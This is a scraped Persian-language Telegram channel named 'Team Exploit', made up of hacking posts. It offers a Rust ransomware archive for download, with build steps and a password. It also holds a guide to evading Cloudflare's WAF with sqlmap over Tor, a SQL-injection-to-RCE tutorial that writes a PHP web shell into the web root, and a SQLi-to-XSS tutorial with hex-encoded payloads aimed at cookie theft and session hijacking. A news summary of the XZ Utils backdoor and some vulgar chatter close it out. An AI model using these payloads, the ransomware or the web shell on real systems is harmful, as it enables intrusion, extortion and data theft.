Team Exploit
1.82K subscribers
192 photos
28 videos
86 files
126 links
Download Telegram
Team Exploit
Photo
یدونه خودم دارم میزنم تا الان خیلی جیگر شده
احتمالا چند روز دیگه میاد و قیمت این از بات نت متصل به ربات تلگرامم بیشتره!
ransomware.rar
6.6 KB
یه باج افزار گوگولی و زیبا نوشته شده با راست


اول از همه وارد دایرکتوریش بشید و پیشنیاز هارو نصب کنید

cargo build

فایل
constants.rs رو هم ادیت کنید

و بعد کامپایل کنید؛

Pass: @esfelurm

┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
کیبورد جاذاب
This media is not supported in your browser
VIEW IN TELEGRAM
پاول دلقک ریده به سین چنلا
باز معلوم نیست چه عنی میخواد اد کنه به تلگرام
هرکی گفت ترموکبص بده بگید عمت خرابه
👍4
نحوه بای پس WAF با sqlmap

اول از همه، شما باید مطمئن شوید که سایت مورد نظر توسط Cloudflare محافظت می شود، می توانید برای تایید " — ID-waf" را اضافه کنید. با این حال، " — thread=" را بزرگتر از 1 قرار ندهید زیرا هدف به شما خطای "403 Forbidden" می دهد. هنگامی که "خطای 403" را دریافت کردید، آدرس IP شما بلاک می شود. بنابراین، شما باید در نظر داشته باشید که از سرورهای پروکسی یا TOR برای دسترسی به هدف استفاده کنید.

شما باید " — tamper='between,randomcase,space2comment'" و "-v 3" رو اضافه کنید ، در صورتی که هدف محافظت شده توسط Cloudflare تایید شده باشد. همچنین می‌توانید در صورت لزوم «--random-agent» و «-tor» را اضافه کنید.

برای استفاده موفقیت آمیز tor ممکن است نیاز به نصب privoxy داشته باشید

sudo apt install privoxy -y 
sudo /etc/init.d/privoxy start
در نهایت حمله را شروع کنید!

python sqlmap.py -u "https://www.target.com/" --identify-waf --tamper="between,randomcase,space2comment" -v 3 --random-agent --tor
#Sqlmap

┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
نحوه رسیدن اسیب پذیری Sqli به Rce
Team Exploit
نحوه رسیدن اسیب پذیری Sqli به Rce
اولین کاری که انجام می دهیم این است که بررسی کنیم sql در کجا روی سرور اجرا می شود. این کار با تزریق دستور @@datadir به پرس و جوی sql انجام می شود تا مسیر کامل مکان آن در سرور به دست آید.

مثال:

با فرض اینکه بازتابی را در ستون دوم پیدا کنیم، بار زیر را وارد خواهیم کرد:


union select 1,@@datadir,3,4 --
و خروجی به صورت زیر خواهد بود:

C:\xampp\mysql\data\

چگونه SQLI به RCE را اجرا کنیم؟

با توجه به مسیر می توانیم استنباط کنیم که سرور از xampp استفاده می کند و اگر بخواهیم یک فایل ایجاد کنیم و از سرور به آن دسترسی داشته باشیم باید آن را در C:\xampp\htdocs



با توجه به این اطلاعات، در حال حاضر امکان ایجاد پیلود برای شل وجود دارد:
union select 1,<php_payload>,3,4 into outfile <path> --
مثال:
union select 1,'<?php system($_GET["cmd"]); ?>',3,4 intooutfile 'C:\\xampp\\htdocs\\rce.php' --
و تمام، ما یک شل معکوس در سیستم ایجاد کردیم. اکنون فقط برای دسترسی به آن از خارج (وب) باقی مانده است. و این کار از لینک زیر انجام می شود:

<host>/rce.php?cmd=<command>
ماله من روی سرور محلی است پس:

127.0.0.1/rce.php?cmd=time

با خروجی زیر:

1 The current time is: 16:22:25.20 Enter the new time: 3 4

حالا وب شل را از طریق sqli آپلود کنید


++++++++++++++++++++++++

ترجمه و جمع اوری شده از سایت SQLI -> RCE

┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
اسیب پذیری SiXSS یا Sqli to Xss
Team Exploit
اسیب پذیری SiXSS یا Sqli to Xss
برای رسیدن به SiXSS باید مراحل زیر را طی کنیم.

من این روش را خیلی دوست ندارم زیرا خطا را در صفحه وب فلش می کند و در بسیاری از موارد ممکن است کل صفحه را دریافت نکنید، اما فقط یک صفحه خالی با خطا است و اصلا جالب نیست. اما از آنجایی که این یکی از راه‌ها نیز هست، به عنوان مثال یک وب‌سایت آسیب‌پذیر را در نظر می‌گیریم.

exploitable-web.com/link.php?id=1

وقتی یک نقل قول را در انتهای وب سایت قرار می دهیم ممکن است با خطای مشابه مواجه شویم.

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 1
خوب این اولین نکته ای است که می توانیم XSS را به وب سایت تزریق کنیم. بنابراین این بار به جای تنها نقل قول، این را تزریق می کنیم:

' ;<img src=x onerror=prompt(/XSS/)>
تزریق بالا یک کادر محاوره ای را نشان می دهد که XSS می گوید. این یکی حمله اساسی است. حالا بیایید ببینیم چگونه می توانیم XSS را به روشی بهتر تزریق کنیم. تزریق XSS به Query. هنگامی که دریافت Number of Column انجام شد و ما برای Union Query آماده هستیم. فرض کنید 4 ستون داریم، بنابراین کوئری اتحادیه ما به صورت زیر خواهد بود:
http://exploitable-web.com/link.php?id=1' union select 1,2,3,4--
فرض کنید ستون 3 به عنوان خروجی در صفحه وب چاپ می شود. بنابراین بار XSS خود را به آن تزریق می کنیم. برای ساده کردن کارها، بار خود را به صورت هگز کدگذاری می کنیم. بار تزریق XSS ما :

<img src=x onerror=confirm(/XSS/)>
مقدار کدگذاری شده Hex :
0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e
تزریق پیلود ما:
http://exploitable-web.com/link.php?id=-1' union select 1,2,0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e,4--
لینک XSS ما را به وب سایت خروجی می دهد. این یکی از پیلود های اولیه XSS است، اکنون ما آزاد هستیم تا با استفاده از XSS کارهای دیگری مانند سرقت کوکی، فیشینگ XSS، فیشینگ XSS iFrame، XSS زنجیره‌ای، ربودن جلسه، حمله CSRF، XssDdos و سایر حملات را انجام دهیم .

جمع اوری و ترجمه شده از سایت Sqli to Xss

┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
در 29 مارس 2024، یک بکدور در یک بسته محبوب به نام XZ Utils در لیست پستی Openwall اعلام شد . این ابزار شامل کتابخانه ای به نام liblzma است که توسط SSHD، بخش مهمی از زیرساخت اینترنت مورد استفاده برای دسترسی از راه دور استفاده می شود. وقتی بارگذاری می‌شود، CVE-2024-3094 بر احراز هویت SSHD تأثیر می‌گذارد که به طور بالقوه اجازه دسترسی مزاحمان را بدون توجه به روش می‌دهد.

نسخه های تحت تأثیر: 5.6.0، 5.6.1

توزیع های تحت تأثیر: فدورا 41، فدورا راوید



┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
Team Exploit
در 29 مارس 2024، یک بکدور در یک بسته محبوب به نام XZ Utils در لیست پستی Openwall اعلام شد . این ابزار شامل کتابخانه ای به نام liblzma است که توسط SSHD، بخش مهمی از زیرساخت اینترنت مورد استفاده برای دسترسی از راه دور استفاده می شود. وقتی بارگذاری می‌شود، CVE…
یک مهندس نرم افزار در مایکروسافت در حال کار برروی نسخه ناپایدار و ادج توزیع دبیان بوده است که به اصطلاح به این نسخه‌ها ، نسخه های Testing میگویند. این مهندس نرم افزار بصورت اتفاقی متوجه میشود که هنگام برقراری اتصال به سرویس SSH تغییراتی در میزان لود CPU و تاخیر زمانی 500 میلی ثانیه اتفاق میفتد.این تغییرات اونقدر کوچک هستند که کمتر کسی میتواند به این موضوع مشکوک شود و تقریبا همه افراد اینچنین موضوعات را به پای اختلالات اینترنتی و شبکه و ... میگذارند اما این مهندس نرم افزار شرکت مایکروسافت موضوع را پیگیری کرده و متوجه میشود یک بکدور در کتابخانه liblzma بسته نرم افزاری xz-utils وجود دارد. این مهندس نرم افزار باتوجه به احتمالاتی که میدهد اقدام به بررسی اجزای مختلف تشکیل دهنده سرویس SSH میکند و همچنین توزیع دبیان Testing را نیز مورد بررسی قرار میدهد چرا که این مشکل میتوانست از منشا خوده توزیع دبیان و یا کرنل لینوکس قرار گرفته برروی آن باشد.در نهایت با مقایسه بسته های نرم افزاری اجزای تشکیل دهنده سرویس SSH در نسخه Testing و Stable دبیان متوجه میشوند که کتابخانه liblzma در بسته نرم افزاری xz-utils دارای درب پشتی است. همچنین قابل ذکر است نسخه های جدید بسته نرم افزاری xz-utils که در واقع نسخه های 5.6.0 و 5.6.1 هستند این مشکل را دارند و بدلیل اینکه این نسخه ها هنوز وارد مخازن نسخه های Stable دبیان نشده بودند خوشبختانه فقط نسخه های Testing آلوده شده بودند. همچنین میتوان نتیجه گرفت این مشکل به توزیع دبیان مربوط نمیشود بلکه تمامی توزیع های لینوکسی که از بسته نرم افزاری xz-utils نسخه های 5.6.0 و 5.6.1 استفاده میکردند دارای این درب پشتی هستند که لیست آن توزیع ها را میتوانید در عکس پایین مشاهده کنید:
اینو گذاشتم براتون که بگم اسیب پذیری ها تو همین ریزه کاری هاست